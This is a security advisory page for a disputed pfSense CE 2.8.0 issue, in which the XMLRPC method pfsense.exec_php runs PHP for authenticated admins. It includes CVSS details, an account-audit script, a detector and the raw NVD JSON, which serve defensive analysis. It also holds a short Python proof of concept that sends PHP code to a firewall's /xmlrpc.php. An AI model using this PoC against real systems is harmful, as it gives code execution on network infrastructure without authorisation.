Security Vulnerability Report
CVE-2025-69691 CVSS 9.9 CRITICAL (disputed by the supplier; NVD record status: Undergoing Analysis)

CVE-2025-69691

Published: 2026-05-08 07:16:29
Last Modified: 2026-05-08 22:16:29

Description

Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code.
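The description and the dispute turn on one question: which accounts can actually call pfsense.exec_php on a given firewall. The following audit script is an added example, not pfSense or NVD code. It parses a pfSense-style config.xml and lists every account that can reach the XMLRPC API, together with how it got that right. Three things are assumptions to verify against your pfSense version: that uid 0 (the built-in admin) is always accepted by xmlrpc.php, that any other account needs the privilege page-all or page-xmlrpclibrary either directly or through group membership, and that a <disabled/> element marks a disabled user. The sample config is constructed for the example.

```python
#!/usr/bin/env python3
"""Audit a pfSense config.xml for accounts that can reach the XMLRPC API.

Added example, not pfSense code. Assumptions (verify against your version):
  * uid 0 (the built-in admin) is always accepted by xmlrpc.php,
  * any other account needs the privilege page-all or page-xmlrpclibrary,
    either directly on the <user> or inherited from a <group> it belongs to,
  * a <disabled/> element on a <user> marks a disabled account.
"""
import xml.etree.ElementTree as ET

XMLRPC_PRIVS = {"page-all", "page-xmlrpclibrary"}

# Constructed sample in the shape of pfSense's <system> section:
# the built-in admin, an HA-sync service account, a read-only helpdesk
# account and a disabled former administrator still in the admins group.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<pfsense>
  <system>
    <user>
      <name>admin</name><uid>0</uid><scope>system</scope>
      <groupname>admins</groupname>
    </user>
    <user>
      <name>hasync</name><uid>2000</uid><scope>user</scope>
      <priv>page-xmlrpclibrary</priv>
    </user>
    <user>
      <name>helpdesk</name><uid>2001</uid><scope>user</scope>
      <groupname>readonly</groupname>
    </user>
    <user>
      <name>oldadmin</name><uid>2002</uid><scope>user</scope>
      <disabled/>
    </user>
    <group>
      <name>admins</name><gid>1999</gid>
      <member>0</member><member>2002</member>
      <priv>page-all</priv>
    </group>
    <group>
      <name>readonly</name><gid>2000</gid>
      <member>2001</member>
      <priv>page-dashboard-all</priv>
    </group>
  </system>
</pfsense>"""


def xmlrpc_capable_accounts(config_xml):
    """Return {username: {"privs": [...], "disabled": bool, "via": [...]}}
    for every account that xmlrpc.php would accept under the assumptions
    above. "via" records each reason the account qualifies."""
    root = ET.fromstring(config_xml)
    system = root.find("system")

    # Group privileges keyed by member uid (pfSense stores uids in <member>)
    group_privs = {}  # uid -> list of (groupname, priv)
    for group in system.findall("group"):
        gname = group.findtext("name")
        privs = [p.text for p in group.findall("priv")]
        for member in group.findall("member"):
            group_privs.setdefault(member.text, []).extend(
                (gname, p) for p in privs)

    result = {}
    for user in system.findall("user"):
        name = user.findtext("name")
        uid = user.findtext("uid")
        direct = {p.text for p in user.findall("priv")}
        inherited = group_privs.get(uid, [])
        effective = direct | {p for _, p in inherited}

        via = []
        if uid == "0":
            via.append("uid 0 (built-in admin)")
        via += [f"direct:{p}" for p in sorted(direct & XMLRPC_PRIVS)]
        via += [f"group {g}:{p}" for g, p in inherited if p in XMLRPC_PRIVS]
        if not via:
            continue
        result[name] = {
            "privs": sorted(effective),
            "disabled": user.find("disabled") is not None,
            "via": via,
        }
    return result


if __name__ == "__main__":
    for name, info in xmlrpc_capable_accounts(SAMPLE_CONFIG).items():
        state = "DISABLED" if info["disabled"] else "active"
        print(f"{name:10} {state:8} via {', '.join(info['via'])}")
```

Run it against a real config.xml (Diagnostics > Backup & Restore) and review every listed account as if it held a shell on the firewall, because with exec_php that is what it holds: disabled leftovers in the admins group should be deleted, and the HA-sync account should be the only non-human account with page-xmlrpclibrary.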

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Metric Source
134c704f-9b21-4f2e-91b3-4a467353bcc0 (secondary metric; no primary NVD score has been published, record status Undergoing Analysis)
Weaknesses
CWE-284 (Improper Access Control), CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes)

Note on the vector: it rates Privileges Required as Low (PR:L). The supplier's dispute is exactly that pfsense.exec_php is reachable only with administrator credentials; rescored as PR:H with the other metrics unchanged the base score would be 9.1, and more importantly an administrator running PHP on the firewall is the documented purpose of the call rather than a crossing of a trust boundary. Treat the record as "admin credentials equal code execution on the firewall", which is true of pfSense by design, and protect the management interface accordingly.

Configurations (Affected Products)

No CPE configuration data has been published yet (record status: Undergoing Analysis). Product named in the description: Netgate pfSense CE 2.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-69691 PoC for Netgate pfSense CE
# Target: pfsense.exec_php via XMLRPC
#
# xmlrpc.php authenticates every call with HTTP Basic credentials;
# xmlrpc.client sends them when they are embedded in the URL. <USER>/<PASS>
# must be a webConfigurator account allowed to use the API, which is the
# supplier's point: this is an authenticated, admin-level call.
import ssl
import xmlrpc.client

# pfSense's webConfigurator defaults to HTTPS with a self-signed certificate;
# use http:// if the target is configured that way.
target_url = "https://<USER>:<PASS>@<TARGET_IP>/xmlrpc.php"
command = "phpinfo();"  # PHP code to execute on the firewall

try:
    # Certificate verification is disabled for the lab target only
    proxy = xmlrpc.client.ServerProxy(
        target_url, context=ssl._create_unverified_context())

    print(f"[*] Sending payload to {target_url}")
    print(f"[*] Executing PHP code: {command}")

    # xmlrpc.client maps proxy.pfsense.exec_php(...) onto the remote method
    # name "pfsense.exec_php"; proxy.call(...) would invoke a non-existent
    # method named "call"
    response = proxy.pfsense.exec_php(command)
    print("[+] Response received:")
    print(response)
except Exception as e:
    print(f"[-] Error: {e}")
```
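What the PoC actually puts on the wire is an ordinary XML-RPC methodCall, which is also what a reverse proxy or IDS in front of /xmlrpc.php can key on. The block below is an added example, not pfSense or NVD code: it builds the same request body that ServerProxy.pfsense.exec_php(...) sends, using only xmlrpc.client.dumps from the standard library, and a small inspector that parses a body with xmlrpc.client.loads and flags code-execution methods. pfsense.exec_php is the method named in the advisory; pfsense.exec_shell and pfsense.host_firmware_version are assumed to exist alongside it and the sample bodies are constructed for the example.

```python
#!/usr/bin/env python3
"""What the PoC puts on the wire, and a detector for it.

Added example, not pfSense or NVD code. dumps() builds the same request
body that ServerProxy.pfsense.exec_php(...) sends; loads() parses one back.
The set of code-execution method names is an assumption: pfsense.exec_php
is the one named in the advisory, pfsense.exec_shell is assumed to exist
alongside it.
"""
import xmlrpc.client

CODE_EXEC_METHODS = {"pfsense.exec_php", "pfsense.exec_shell"}


def build_exec_php_request(php_code):
    """Serialise the request the PoC sends (HTTP body only, no headers)."""
    return xmlrpc.client.dumps((php_code,), methodname="pfsense.exec_php")


def inspect_xmlrpc_body(body):
    """Parse an XML-RPC request body; return (methodname, params, flagged).

    flagged is True when the method is a code-execution primitive, which is
    what a proxy or IDS should alert on (or block for source addresses that
    are not the HA peer). Malformed bodies come back as
    ("<unparseable>", (), False) instead of raising.
    """
    try:
        params, methodname = xmlrpc.client.loads(body)
    except Exception:
        return ("<unparseable>", (), False)
    return (methodname, params, methodname in CODE_EXEC_METHODS)


# Constructed sample bodies: the PoC's request, a benign call (method name
# assumed), and a truncated body such as a scanner might send
SAMPLE_BODIES = [
    build_exec_php_request("phpinfo();"),
    xmlrpc.client.dumps((), methodname="pfsense.host_firmware_version"),
    "<methodCall><methodName>pfsense.exec_php</methodName>",
]

if __name__ == "__main__":
    print(SAMPLE_BODIES[0])
    for body in SAMPLE_BODIES:
        method, params, flagged = inspect_xmlrpc_body(body)
        print(f"{'ALERT' if flagged else '     '} {method} {params!r}")
```

Because the method name sits in the body rather than the URL, a web server access log alone only shows a POST to /xmlrpc.php; if you want exec_php calls visible, the inspection has to happen on the request body, and the unparseable case should still be logged since it is not a legitimate HA-sync client.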

References

https://seclists.org/fulldisclosure/2026/Feb/16 (original disclosure, Full Disclosure list)
https://www.linkedin.com/in/nelson-adhepeau/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-69691",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T07:16:28.880",
    "lastModified": "2026-05-08T22:16:28.813",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-915"}
        ]
      }
    ],
    "references": [
      {"url": "https://seclists.org/fulldisclosure/2026/Feb/16", "source": "[email protected]"},
      {"url": "https://www.linkedin.com/in/nelson-adhepeau/", "source": "[email protected]"},
      {"url": "https://seclists.org/fulldisclosure/2026/Feb/16", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```